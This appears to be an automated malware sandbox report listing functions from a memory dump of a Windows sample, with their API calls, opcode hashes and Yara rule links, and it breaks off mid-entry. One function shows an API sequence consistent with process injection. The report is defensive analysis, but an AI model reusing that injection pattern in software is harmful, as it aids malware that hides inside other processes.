                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 1378193009-0
                                                                                  • Opcode ID: b60083142ffcedd4f4ce96da40b8791299eb25bb7b16517bbc04da07c1d3dd80
                                                                                  • Instruction ID: d3e60ca063e5a458ac413ca265156f6fce883c2f355b647748b592ec19171967
                                                                                  • Opcode Fuzzy Hash: b60083142ffcedd4f4ce96da40b8791299eb25bb7b16517bbc04da07c1d3dd80
                                                                                  • Instruction Fuzzy Hash: 0421C5709047849FF7329B289859BEABFFCBF51308F14088DE68E67181C3752E849B51
                                                                                  Function 0053C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0053C72F
                                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0053C746
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Temp$FileNamePath
                                                                                  • String ID: aut
                                                                                  • API String ID: 3285503233-3010740371
                                                                                  • Opcode ID: 5ea023560861e9d5126cb87c30d2163627e56fa7c9038d52a3d79c9b2afa8a32
                                                                                  • Instruction ID: 86355ff58075fa486a94872ad385c7fc33e8fd074a4bd176071bba9eb605892d
                                                                                  • Opcode Fuzzy Hash: 5ea023560861e9d5126cb87c30d2163627e56fa7c9038d52a3d79c9b2afa8a32
                                                                                  • Instruction Fuzzy Hash: 98D05B7554030D6BDB509B50EC0DF8A777C5B10704F0001507654950B2DAB0D6DA9B64
                                                                                  Function 0054F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 63e99bcec6e42624ff4decb7285efd5d28c643b29b8c5622525581679075697e
                                                                                  • Instruction ID: ed939f733476f083c51a476b410d0bff965975a086b6d95855e048fc9723be17
                                                                                  • Opcode Fuzzy Hash: 63e99bcec6e42624ff4decb7285efd5d28c643b29b8c5622525581679075697e
                                                                                  • Instruction Fuzzy Hash: C9F15A716083059FC710DF28C495B6EBBE5FF89318F14892EF9959B291D730E905CB82
                                                                                  Function 004F4FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 004F5022
                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 004F50CB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell__memset
                                                                                  • String ID:
                                                                                  • API String ID: 928536360-0
                                                                                  • Opcode ID: c595e127da1108235dca068772499defe11557c3a35d548335b5d8e2e0878958
                                                                                  • Instruction ID: 1508614187ea5baa92fe21b5870209bb74800fa3aec425f364180ecbc1307e12
                                                                                  • Opcode Fuzzy Hash: c595e127da1108235dca068772499defe11557c3a35d548335b5d8e2e0878958
                                                                                  • Instruction Fuzzy Hash: E431AEB0504B05DFD760EF24D8446ABBBF4FF58308F00092EF69A83240EB756948CB9A
                                                                                  Function 0051395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __FF_MSGBANNER.LIBCMT ref: 00513973
                                                                                    • Part of subcall function 005181C2: __NMSG_WRITE.LIBCMT ref: 005181E9
                                                                                    • Part of subcall function 005181C2: __NMSG_WRITE.LIBCMT ref: 005181F3
                                                                                  • __NMSG_WRITE.LIBCMT ref: 0051397A
                                                                                    • Part of subcall function 0051821F: GetModuleFileNameW.KERNEL32(00000000,005B0312,00000104,00000000,00000001,00000000), ref: 005182B1
                                                                                    • Part of subcall function 0051821F: ___crtMessageBoxW.LIBCMT ref: 0051835F
                                                                                    • Part of subcall function 00511145: ___crtCorExitProcess.LIBCMT ref: 0051114B
                                                                                    • Part of subcall function 00511145: ExitProcess.KERNEL32 ref: 00511154
                                                                                    • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
                                                                                  • RtlAllocateHeap.NTDLL(015B0000,00000000,00000001,00000001,00000000,?,?,0050F507,?,0000000E), ref: 0051399F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 1372826849-0
                                                                                  • Opcode ID: 414e57cc067c26b9071c7f7ae9ee6f1431fef477486057e0cf9db68f5bde661d
                                                                                  • Instruction ID: 931b5dd08acaf98d847efaad22ff720677fae6b6fd9cbd5ec5dd8d869d693074
                                                                                  • Opcode Fuzzy Hash: 414e57cc067c26b9071c7f7ae9ee6f1431fef477486057e0cf9db68f5bde661d
                                                                                  • Instruction Fuzzy Hash: 7401D6352456129AF7213F28DC6AAFE3F58BBC1B24B200525F5059B191DFB09DC08AA0
                                                                                  Function 0053C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0053C385,?,?,?,?,?,00000004), ref: 0053C6F2
                                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0053C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0053C708
                                                                                  • CloseHandle.KERNEL32(00000000,?,0053C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0053C70F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                  • String ID:
                                                                                  • API String ID: 3397143404-0
                                                                                  • Opcode ID: cf92a650a387800c08a790c89b5b7196472194871bfbbcbf8e39834f356b7f83
                                                                                  • Instruction ID: 9ce1889a6a0da892c213a24b17b71727f1fd56d7f414de84fa4ba319518cdb48
                                                                                  • Opcode Fuzzy Hash: cf92a650a387800c08a790c89b5b7196472194871bfbbcbf8e39834f356b7f83
                                                                                  • Instruction Fuzzy Hash: 33E08632140214B7DB212B54BC09FCA7F39EF15761F104110FB19790E097B12555A7A8
                                                                                  Function 0053BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0053BB72
                                                                                    • Part of subcall function 00511C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00517A85), ref: 00511CB1
                                                                                    • Part of subcall function 00511C9D: GetLastError.KERNEL32(00000000,?,00517A85), ref: 00511CC3
                                                                                  • _free.LIBCMT ref: 0053BB83
                                                                                  • _free.LIBCMT ref: 0053BB95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                  • Instruction ID: 98c29174761eb0f8762ffca2f3bc85b1acdc9aaf7351201c9b1f946017f952ed
                                                                                  • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                  • Instruction Fuzzy Hash: 7AE0C2A1600B4243FA2065386E48EF76BCC2F44310B04084DB61AE3142CF20EC8084E8
                                                                                  Function 004F2322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004F22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,004F24F1), ref: 004F2303
                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004F25A1
                                                                                  • CoInitialize.OLE32(00000000), ref: 004F2618
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0056503A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3815369404-0
                                                                                  • Opcode ID: 3f0c9853b0eb6305daa7f051a1d6307db8f6bfe2f9ffc4b2f9cd32e85948112d
                                                                                  • Instruction ID: bfa6a360e06a79c8364e0a794c0dab2cf794a2f669fad51ec3c3ba22dbac2137
                                                                                  • Opcode Fuzzy Hash: 3f0c9853b0eb6305daa7f051a1d6307db8f6bfe2f9ffc4b2f9cd32e85948112d
                                                                                  • Instruction Fuzzy Hash: 9B71D1B8801A458A87D4EF5BA9B5499FBE4BB683447E0472ED109C73B1DB706408EF1C
                                                                                  Function 004F3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsThemeActive.UXTHEME ref: 004F3A73
                                                                                    • Part of subcall function 00511405: __lock.LIBCMT ref: 0051140B
                                                                                    • Part of subcall function 004F3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 004F3AF3
                                                                                    • Part of subcall function 004F3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004F3B08
                                                                                    • Part of subcall function 004F3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,004F3AA3,?), ref: 004F3D45
                                                                                    • Part of subcall function 004F3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,004F3AA3,?), ref: 004F3D57
                                                                                    • Part of subcall function 004F3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,005B1148,005B1130,?,?,?,?,004F3AA3,?), ref: 004F3DC8
                                                                                    • Part of subcall function 004F3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,004F3AA3,?), ref: 004F3E48
                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004F3AB3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                  • String ID:
                                                                                  • API String ID: 924797094-0
                                                                                  • Opcode ID: 222f3689d0fcdf7070db454b2806cde81480731dfbcc1df0596629a9be1aac3d
                                                                                  • Instruction ID: 52d28597dfa26bbe74899be127295c5431fcb73aa50bd90836a2964428c773b0
                                                                                  • Opcode Fuzzy Hash: 222f3689d0fcdf7070db454b2806cde81480731dfbcc1df0596629a9be1aac3d
                                                                                  • Instruction Fuzzy Hash: 93118E719043459BD340EF2AED4991EBFE8FFA4710F004A1FF584872A1DB70A989DB96
                                                                                  Function 0051E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___lock_fhandle.LIBCMT ref: 0051EA29
                                                                                  • __close_nolock.LIBCMT ref: 0051EA42
                                                                                    • Part of subcall function 00517BDA: __getptd_noexit.LIBCMT ref: 00517BDA
                                                                                    • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                  • String ID:
                                                                                  • API String ID: 1046115767-0
                                                                                  • Opcode ID: c4924b444c7b011ef997a7b43b8b6376a34d64e9c7692b802f68c4ec2616eb4c
                                                                                  • Instruction ID: c76d845f597020235e836e1c1bfb7972733b7507e72660da21738cafa06cdf3b
                                                                                  • Opcode Fuzzy Hash: c4924b444c7b011ef997a7b43b8b6376a34d64e9c7692b802f68c4ec2616eb4c
                                                                                  • Instruction Fuzzy Hash: 1511A3728096158AF311BF68C84B3DD7E617FC5335F1A0740E8215F1E2C7B49DC09AA1
                                                                                  Function 0050F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0051395C: __FF_MSGBANNER.LIBCMT ref: 00513973
                                                                                    • Part of subcall function 0051395C: __NMSG_WRITE.LIBCMT ref: 0051397A
                                                                                    • Part of subcall function 0051395C: RtlAllocateHeap.NTDLL(015B0000,00000000,00000001,00000001,00000000,?,?,0050F507,?,0000000E), ref: 0051399F
                                                                                  • std::exception::exception.LIBCMT ref: 0050F51E
                                                                                  • __CxxThrowException@8.LIBCMT ref: 0050F533
                                                                                    • Part of subcall function 00516805: RaiseException.KERNEL32(?,?,0000000E,005A6A30,?,?,?,0050F538,0000000E,005A6A30,?,00000001), ref: 00516856
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 3902256705-0
                                                                                  • Opcode ID: 342f86819b8b932a44e42e72db3bcd9bd525db50daeba377c451629277acf8b9
                                                                                  • Instruction ID: 197344495f24e680c6218fae45e0c7b6125d9f1441d5aa581e88db8dce815895
                                                                                  • Opcode Fuzzy Hash: 342f86819b8b932a44e42e72db3bcd9bd525db50daeba377c451629277acf8b9
                                                                                  • Instruction Fuzzy Hash: DBF08C3110421AA7EB14BEA8EC169EE7EE8BF40754F608526F908A2581DBB0968497A5
                                                                                  Function 005135E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
                                                                                  • __lock_file.LIBCMT ref: 00513629
                                                                                    • Part of subcall function 00514E1C: __lock.LIBCMT ref: 00514E3F
                                                                                  • __fclose_nolock.LIBCMT ref: 00513634
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 2800547568-0
                                                                                  • Opcode ID: bd10965f71d58424d0d9540eb22ad34a4cb65ed9a34565e442f54ff0a7e4953d
                                                                                  • Instruction ID: b5e7e4c8e67d69a9b23dfa8e2a76c7e14934d6c8e5a795fd159aa9c288de412f
                                                                                  • Opcode Fuzzy Hash: bd10965f71d58424d0d9540eb22ad34a4cb65ed9a34565e442f54ff0a7e4953d
                                                                                  • Instruction Fuzzy Hash: 0BF0BB31901206AAFB117B65C81A7DE7EA07FC1734F258608E420AB2C1C77C8AC19F55
                                                                                  Function 015F65E5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 015F6DA3
                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015F6E39
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015F6E5B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1318668522.00000000015F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F5000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_15f5000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 2438371351-0
                                                                                  • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                                  • Instruction ID: 1660e9f5b33fb76e0c201bb7997843149d5777e56baf1a9f242c2ea413156a99
                                                                                  • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                                  • Instruction Fuzzy Hash: 0D12DC24E24658C6EB24DF64D8507DEB232FF68300F1094ED910DEB7A4E77A4E85CB5A
                                                                                  Function 00512957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __flush.LIBCMT ref: 00512A0B
                                                                                    • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __flush__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 4101623367-0
                                                                                  • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                  • Instruction ID: faf9d74ea2af9beb75ad06bb39511f6d01456a1e34b1829c2408ddf702dfbaea
                                                                                  • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                  • Instruction Fuzzy Hash: 564172716007069FFF289E69C8855EE7FA6BF84360F24852DE855C7640EAB0DDE18B84
                                                                                  Function 0050ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                  • Instruction ID: 5b39d3372765bae7ec318c0ef9251f5729affd59856b0dad2cd687843c1ea942
                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                  • Instruction Fuzzy Hash: B731E972A00106DBC718DF18C49296DFBB6FF49340B748AA9E409DB295DB30EDC1CB80
                                                                                  Function 00569A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
